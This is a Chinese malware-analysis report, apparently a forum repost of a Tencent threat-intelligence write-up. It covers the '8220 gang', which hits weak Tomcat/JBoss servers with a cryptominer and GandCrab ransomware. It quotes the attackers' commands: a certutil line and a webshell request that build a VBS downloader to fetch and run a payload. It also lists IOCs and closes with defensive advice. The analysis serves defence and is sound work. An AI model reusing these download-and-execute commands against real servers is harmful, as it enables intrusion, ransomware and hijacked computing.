-
-
[原创]“8220团伙”最新活动分析:挖矿木马与勒索病毒共舞
-
发表于: 2018-10-12 15:44
-
一、 概述
前段时间,腾讯御见威胁情报中曾经披露了《Tomcat服务器被爆破入侵,企业遭遇GandCrab勒索病毒新变种与挖矿木马双重打击》(b9cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3W2Q4x3X3c8f1P5g2)9#2k6Y4g2Y4j5W2m8r3e0U0u0a6N6i4t1@1x3r3N6$3d9U0c8m8i4@1g2r3i4@1u0o6i4K6R3&6i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1$3i4K6S2m8i4@1p5#2i4@1f1#2i4K6V1I4i4K6S2m8i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1^5i4@1u0r3i4K6V1I4i4@1f1$3i4K6W2o6i4K6W2r3i4@1f1$3i4K6R3^5i4K6V1I4i4@1f1@1i4@1u0n7i4@1q4o6i4@1f1#2i4K6R3$3i4K6S2p5i4@1f1$3i4@1q4o6i4@1p5I4i4@1f1%4i4K6W2n7i4K6V1I4i4@1f1$3i4K6S2q4i4@1p5%4i4@1f1#2i4K6R3^5i4@1t1H3i4@1f1#2i4@1p5@1i4@1p5%4i4@1f1&6i4K6R3%4i4K6S2r3i4@1f1$3i4K6W2o6i4K6S2p5i4@1f1#2i4K6S2m8i4@1p5I4i4@1f1#2i4K6V1&6i4@1p5^5i4@1f1^5i4@1p5J5i4@1q4n7i4@1f1#2i4K6R3#2i4@1p5#2i4@1f1@1i4@1u0q4i4@1t1#2i4@1f1^5i4K6R3H3i4K6S2o6i4@1f1^5i4@1u0r3i4K6W2n7i4@1f1^5i4@1p5I4i4K6S2o6i4@1f1$3i4K6S2o6i4K6V1$3i4@1f1%4i4K6W2r3i4@1u0r3i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1&6i4K6R3K6i4@1p5^5i4@1f1#2i4K6R3^5i4K6R3$3i4@1f1$3i4K6W2o6i4@1u0m8i4@1f1#2i4K6V1&6i4@1p5^5i4@1f1^5i4@1u0r3i4K6V1^5i4@1f1^5i4@1p5J5i4@1q4n7i4@1f1$3i4K6V1$3i4@1t1H3i4@1f1%4i4K6R3&6i4K6R3^5i4@1f1%4i4K6W2m8i4K6R3@1c8$3q4F1k6p5y4J5j5h3u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7g2U0g2Q4x3X3f1H3i4K6u0W2x3W2!0q4y4g2)9^5b7W2)9&6x3W2!0q4y4#2!0n7y4q4!0m8x3W2!0q4y4#2)9&6y4#2)9^5y4g2!0q4y4W2!0m8c8W2)9&6x3W2!0q4y4W2)9&6y4q4!0n7b7W2!0q4y4g2)9^5y4#2!0n7b7W2!0q4x3#2)9^5x3q4)9^5x3R3`.`.
而通过该组织暴露的ftp地址进行分析发现,该组织疑似友商之前披露的挖矿团伙:“8220挖矿团伙”。为了秉承“谁先发现谁命名”以及情报互通、共享的原则,我们继续沿用友商对该团伙的命名。、
图0
一、 分析
1、 入侵路径
该团伙利用多个漏洞以及弱口令进行入侵,入侵成功后,会上传webshell,通过webshell执行下载命令,下载挖矿木马并执行。
图1
执行命令为:
cmd.exe /c certutil.exe -urlcache -split -f 068K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0V1K6i4K6u0W2x3e0M7@1i4K6u0W2z5e0y4Q4x3X3f1I4y4o6W2Q4x3V1k6S2L8Y4c8K6M7s2W2%4j5i4u0W2M7#2)9J5k6h3g2^5k6b7`.`. C:/Windows/temp/dog.exe&cmd.exe /c C:/Windows/temp/dog.exe
1、 样本分析
样本(antspywares.exe)首先创建互斥量"4e064bee1f3860fd606a",然后调用解密函数对内置加密的挖矿配置数据进行解密。解密密钥为"0125789244697858",解密出来的挖矿配置数据除了钱包地址和矿池以外,还有用于获取最新挖矿配置文件的下载地址url。
图2
然后样本会访问下载解密的更新配置文件url,并在%appdata%目录下创建"SkkdFvhVkY"文件夹,将更新配置文件信息和样本复制到该文件夹下。
图3
同时在"Startup"文件夹下写入SLVjiAEwaK.url文件,用于自启动。
图4
随后会根据系统环境不同创建不同的傀儡进程,解密数据段中的矿机,将矿机注入傀儡进程中,并以傀儡进程进行挖矿。
利用的傀儡进程:
图5
创建傀儡进程挖矿:
图6
被注入的矿机:
图7
三、 关联分析
在腾讯御见情报中心查询下载C&C,发现其21端口开放(FTP服务),
图8
于是我们试图访问了该FTP服务器,发现是允许访问的,并在其目录下发现多个文件,包括此次下载的挖矿木马。
图9
对其ftp服务器上的文件进行分析发现,发现大多文件均为存在不同漏洞的服务器合集。
如其中一个文件夹,猜测是通过tomcat漏洞或者弱口令扫描到到服务器地址集合:
图10
在分析下载下来的文件中发现一个用于挖矿的配置文件3.json文件:
图11
其使用的钱包地址为
"4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg"
而该钱包地址曾经被友商所披露的8220挖矿团伙所使用(图为友商报告中的钱包信息截图):
图12
同样矿池地址158.69.133.20:3333也跟友商报告中的一致:
图13
此外,根据该团伙的FTP上下载下来的文件分析发现,大多都是存在漏洞服务器ip合集,而该特性同样跟友商的报告中指出的“该团伙擅长使用不同的服务器漏洞进行攻击并且进行挖矿”的特性相一致。
如某段shell脚本(logo8.jpg):
图14
因此我们确定该恶意基础设施为“8220团伙”所有。
同时我们对其中一位受害者服务器暴露在外网的日志分析发现,该服务器上还被下载运行了GandCrab 5.0.2勒索病毒。
图15
执行命令行:
GET /jbossass/jbossass.jsp?ppp=cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>%TEMP%\poc.vbs &@echo objXMLHTTP.open "GET","4fdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5#2z5g2)9J5k6e0j5#2i4K6u0W2x3e0f1#2i4K6u0W2x3e0N6Q4x3V1k6V1k6h3k6S2N6h3I4@1i4K6u0W2k6i4S2W2",false>>%TEMP%\poc.vbs&@echo objXMLHTTP.send()>>%TEMP%\poc.vbs&@echo If objXMLHTTP.Status=200 Then>>%TEMP%\poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>%TEMP%\poc.vbs&@echo objADOStream.Open>>%TEMP%\poc.vbs&@echo objADOStream.Type=1 >>%TEMP%\poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>%TEMP%\poc.vbs&@echo objADOStream.Position=0 >>%TEMP%\poc.vbs&@echo objADOStream.SaveToFile "%TEMP%\default.exe">>%TEMP%\poc.vbs&@echo objADOStream.Close>>%TEMP%\poc.vbs&@echo Set objADOStream=Nothing>>%TEMP%\poc.vbs&@echo End if>>%TEMP%\poc.vbs&@echo Set objXMLHTTP=Nothing>>%TEMP%\poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>%TEMP%\poc.vbs&@echo objShell.Exec("%TEMP%\default.exe")>>%TEMP%\poc.vbs&cscript.exe %TEMP%\poc.vbs" HTTP/1.1
中毒后截图:
图16
同时我们在开源蜜罐网站上发现该恶意基础设施以前的攻击流量,与受害者日志上的对比发现,在jspshell命名和命令执行上高度相似。可以确定受害者服务器上的勒索病毒也为“8220团伙”传播。
图17
并且结合最近腾讯御见情报中心发现利用Tomcat弱口令进行传播GandCrab勒索病毒案例中的命令行和勒索病毒文件名具有高度相似。我们确定“8220团伙”为最近利用服务器漏洞进行传播GandCrab的幕后黑手。
国内受害者分布:
图18
四、 安全建议
1、 尽量关闭不必要的端口,如:445、135,139等,对3389端口可进行白名单配置,只允许白名单内的IP连接登陆。
2、 尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。
3、 采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。
4、 对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。
5、 建议全网安装御点终端安全管理系统
6、 (b2fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6i4K6u0W2N6r3g2F1j5$3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8Y4m8J5L8$3c8#2j5%4c8Q4x3V1k6&6k6q4)9J5c8X3W2F1k6r3g2^5i4K6u0W2K9s2c8E0L8q4!0q4c8W2!0n7b7#2)9^5z5g2!0q4x3#2)9^5x3q4)9^5x3W2!0q4y4g2!0n7c8g2!0m8x3g2!0q4y4#2)9^5x3W2!0n7z5g2!0q4y4#2!0n7b7W2)9^5z5q4!0q4y4#2!0m8b7W2!0m8c8W2!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4y4#2!0n7x3#2!0n7b7W2!0q4y4#2!0n7b7W2)9&6c8W2!0q4y4g2)9^5y4g2!0n7y4#2!0q4y4g2!0m8y4q4)9^5y4#2!0q4y4#2!0n7b7W2)9^5z5q4!0q4y4#2!0m8b7W2!0m8c8W2!0q4y4W2)9&6c8q4)9^5x3q4!0q4y4W2!0m8c8W2)9&6x3W2!0q4y4#2!0n7b7W2)9&6c8W2!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4W2)9^5c8g2!0m8y4#2!0q4x3#2)9^5x3q4)9^5x3g2!0q4y4q4!0n7c8W2!0m8c8g2!0q4y4g2!0m8y4q4)9^5c8q4!0q4y4W2!0n7b7#2)9^5c8W2!0q4y4W2!0n7y4q4)9&6c8g2!0q4y4#2!0n7b7W2)9&6c8W2!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4W2)9^5c8g2!0m8y4#2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4g2)9^5c8W2)9^5b7g2!0q4y4#2!0m8c8q4)9&6y4W2!0q4y4#2)9&6y4g2!0m8y4g2!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4W2)9^5c8g2!0m8y4#2!0q4y4#2!0m8c8q4)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4W2)9&6y4W2!0n7z5g2!0q4y4q4!0n7c8q4)9^5c8q4!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4y4g2)9^5b7g2)9&6c8W2!0q4z5q4)9^5x3#2!0n7c8q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4g2)9^5c8W2!0m8c8W2!0q4y4g2!0n7z5q4!0m8c8g2!0q4y4g2)9^5b7g2!0m8z5g2!0q4y4q4!0n7b7#2)9^5x3g2!0q4y4q4!0n7z5q4)9&6b7g2!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4z5q4)9^5x3q4)9^5y4g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4z5g2)9&6c8q4!0m8x3W2!0q4y4q4!0n7b7g2)9^5y4W2!0q4z5q4!0m8y4#2!0m8x3#2!0q4x3#2)9^5x3q4)9^5x3g2!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4y4q4!0n7b7#2)9^5x3g2!0q4y4q4!0n7z5q4)9&6b7g2!0q4y4g2)9^5y4W2)9^5y4g2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4#2)9^5b7g2!0n7y4W2!0q4y4g2)9^5y4W2!0n7y4g2!0q4x3#2)9^5x3q4)9^5x3g2!0q4y4q4!0n7c8W2)9&6c8q4!0q4y4W2)9^5b7g2!0m8y4q4!0q4y4q4!0n7b7#2)9^5x3g2!0q4y4q4!0n7z5q4)9&6b7g2!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4x3#2)9^5x3q4)9^5x3R3`.`.
图19
五、 附录(IOCs)
MD5:
4b5df24b5deda127966029ce0fd83897
9083b91d422664261d7fcb0a010d5220
9443df27424eb2d888b66871875d71f8
URL:
609K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5#2z5g2)9J5k6e0j5#2i4K6u0W2x3e0f1#2i4K6u0W2x3e0N6Q4x3V1k6V1k6h3k6S2N6h3I4@1i4K6u0W2k6i4S2W2
daeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0V1K6i4K6u0W2x3e0M7@1i4K6u0W2z5e0y4Q4x3X3f1I4y4o6W2Q4x3V1k6S2L8Y4c8K6M7s2W2%4j5i4u0W2M7#2)9J5k6h3g2^5k6b7`.`.
34fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0V1K6i4K6u0W2x3e0M7@1i4K6u0W2z5e0y4Q4x3X3f1I4y4o6W2Q4x3V1k6^5L8i4u0Q4x3X3g2@1P5s2b7`.
f2eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6z5q4)9J5k6e0f1H3i4K6u0W2x3e0M7&6i4K6u0W2x3e0l9&6i4K6y4m8z5o6l9J5x3q4)9J5c8Y4c8S2M7$3E0Z5L8%4y4@1P5s2A6Q4x3X3g2W2P5r3f1`.
C2:
159.65.155.17
93.174.93.149
198.50.179.109
193.169.252.253
192.99.142.235
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
